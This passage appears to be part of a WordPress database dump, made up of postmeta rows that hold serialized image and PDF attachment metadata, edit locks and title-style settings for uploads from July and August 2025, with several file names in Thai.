:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:350504;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:16:\"prr-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1166154;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"prr-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85697;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5352,1904,'_wp_attached_file','2025/07/prr-1.png'),
(5353,1904,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:17:\"2025/07/prr-1.png\";s:8:\"filesize\";i:1300572;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"prr-1-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66691;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"prr-1-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:588143;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"prr-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28410;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"prr-1-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:354631;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"prr-1-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1181136;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"prr-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86642;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5354,1905,'title_style','hidden'),
(5355,1905,'_title_style','field_5d1a0217cf408'),
(5356,1907,'_wp_attached_file','2025/07/การลา.png'),
(5357,1907,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:27:\"2025/07/การลา.png\";s:8:\"filesize\";i:13558;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5358,1908,'_wp_attached_file','2025/07/การลา-1.png'),
(5359,1908,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:29:\"2025/07/การลา-1.png\";s:8:\"filesize\";i:13558;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5360,1909,'title_style','hidden'),
(5361,1909,'_title_style','field_5d1a0217cf408'),
(5365,1910,'title_style','hidden'),
(5366,1910,'_title_style','field_5d1a0217cf408'),
(5374,1912,'title_style','hidden'),
(5375,1912,'_title_style','field_5d1a0217cf408'),
(5377,1914,'_wp_attached_file','2025/08/สีม่วง-สีเขียว-น่ารัก-บ้าบิ่นมะพร้าวอ่อน-โลโก้-100-x-100-px-150-x-150-px.png'),
(5378,1914,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:168:\"2025/08/สีม่วง-สีเขียว-น่ารัก-บ้าบิ่นมะพร้าวอ่อน-โลโก้-100-x-100-px-150-x-150-px.png\";s:8:\"filesize\";i:6920;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5379,1915,'_edit_lock','1754463294:1'),
(5380,1915,'_edit_last','1'),
(5381,1915,'title_style','hidden'),
(5382,1915,'_title_style','field_5d1a0217cf408'),
(5383,1916,'title_style','default'),
(5384,1916,'_title_style','field_5d1a0217cf408'),
(5386,1918,'_wp_attached_file','2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf'),
(5387,1918,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:177822;}'),
(5388,1919,'_wp_attached_file','2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf'),
(5389,1919,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:291312;}'),
(5390,1920,'_wp_attached_file','2025/08/Is-It-a-Gift-Instagram-Post.png'),
(5391,1920,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:39:\"2025/08/Is-It-a-Gift-Instagram-Post.png\";s:8:\"filesize\";i:65295;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"Is-It-a-Gift-Instagram-Post-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13865;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"Is-It-a-Gift-Instagram-Post-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99507;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10402;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62173;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34210;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5392,1921,'title_style','hidden'),
(5393,1921,'_title_style','field_5d1a0217cf408'),
(5394,1924,'_edit_lock','1755141066:1'),
(5395,1925,'_edit_lock','1755141477:1'),
(5396,1926,'_wp_attached_file','2025/08/14-68.png'),
(5397,1926,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/08/14-68.png\";s:8:\"filesize\";i:773931;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"14-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98799;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"14-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:920020;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"14-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"14-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1027450;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"14-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1951881;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"14-68-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79682;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5399,1925,'_thumbnail_id','1926'),
(5400,1925,'_edit_last','1'),
(5401,1925,'title_style','default'),
(5402,1925,'_title_style','field_5d1a0217cf408'),
(5403,1925,'related',''),
(5404,1925,'_related','field_603b51c3e183e'),
(5405,1927,'title_style','default'),
(5406,1927,'_title_style','field_5d1a0217cf408'),
(5407,1927,'related',''),
(5408,1927,'_related','field_603b51c3e183e'),
(5409,1928,'_edit_lock','1755141569:1'),
(5410,1929,'_wp_attached_file','2025/08/15-68.png'),
(5411,1929,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/08/15-68.png\";s:8:\"filesize\";i:782263;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"15-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106718;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"15-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:922266;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"15-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42428;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"15-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1029395;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"15-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1926575;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"15-68-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115088;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5413,1928,'_thumbnail_id','1929'),
(5414,1928,'_edit_last','1'),
(5415,1928,'title_style','hidden'),
(5416,1928,'_title_style','field_5d1a0217cf408'),
(5417,1928,'related',''),
(5418,1928,'_related','field_603b51c3e183e'),
(5419,1930,'title_style','hidden'),
(5420,1930,'_title_style','field_5d1a0217cf408'),
(5421,1930,'related',''),
(5422,1930,'_related','field_603b51c3e183e'),
(5423,1932,'_edit_lock','1755141666:1'),
(5424,1933,'_wp_attached_file','2025/08/16-68.png'),
(5425,1933,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/08/16-68.png\";s:8:\"filesize\";i:984027;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"16-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123459;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"16-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1181382;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"16-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46302;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"16-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1322685;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"16-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2558730;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"16-68-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119199;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5427,1932,'_thumbnail_id','1933'),
(5428,1932,'_edit_last','1'),
(5429,1932,'title_style','hidden'),
(5430,1932,'_title_style','field_5d1a0217cf408'),
(5431,1932,'related',''),
(5432,1932,'_related','field_603b51c3e183e'),
(5433,1934,'title_style','hidden'),
(5434,1934,'_title_style','field_5d1a0217cf408'),
(5435,1934,'related',''),
(5436,1934,'_related','field_603b51c3e183e'),
(5438,1936,'_edit_lock','1755142060:1'),
(5439,1937,'_wp_attached_file','2025/08/S__10281031.jpg'),
(5440,1937,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/08/S__10281031.jpg\";s:8:\"filesize\";i:338536;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__10281031-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17006;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__10281031-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119537;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__10281031-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7162;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__10281031-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75882;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__10281031-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16115;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5441,1938,'_wp_attached_file','2025/08/S__10281043.jpg'),
(5442,1938,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/08/S__10281043.jpg\";s:8:\"filesize\";i:377665;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__10281043-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18062;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__10281043-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131571;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__10281043-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7332;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__10281043-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83271;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__10281043-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17566;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5443,1940,'_wp_attached_file','2025/08/336040.jpg'),
(5444,1939,'_wp_attached_file','2025/08/S__25690139.jpg'),
(5445,1939,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:23:\"2025/08/S__25690139.jpg\";s:8:\"filesize\";i:704525;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__25690139-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19381;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__25690139-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116651;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__25690139-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8293;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__25690139-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76603;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__25690139-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214905;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__25690139-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:334569;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__25690139-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17319;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5446,1940,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1756;s:6:\"height\";i:932;s:4:\"file\";s:18:\"2025/08/336040.jpg\";s:8:\"filesize\";i:226480;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"336040-300x159.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18799;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"336040-1024x543.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128079;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"336040-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"336040-768x408.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83136;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"336040-1536x815.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:815;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231489;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"336040-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23954;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5447,1941,'_wp_attached_file','2025/08/336048.jpg'),
(5448,1941,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:18:\"2025/08/336048.jpg\";s:8:\"filesize\";i:178346;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"336048-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18582;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"336048-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128802;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"336048-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8215;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"336048-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128802;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"336048-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20596;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5449,1942,'_wp_attached_file','2025/08/335147.jpg'),
(5450,1942,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:18:\"2025/08/335147.jpg\";s:8:\"filesize\";i:219806;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"335147-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21956;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"335147-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155925;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"335147-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8789;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"335147-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98741;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"335147-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21526;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5452,1936,'_edit_last','1'),
(5453,1936,'title_style','default'),
(5454,1936,'_title_style','field_5d1a0217cf408'),
(5455,1936,'related',''),
(5456,1936,'_related','field_603b51c3e183e'),
(5457,1943,'title_style','default'),
(5458,1943,'_title_style','field_5d1a0217cf408'),
(5459,1943,'related',''),
(5460,1943,'_related','field_603b51c3e183e'),
(5461,1944,'_edit_lock','1755141951:1'),
(5462,1945,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_46.jpg'),
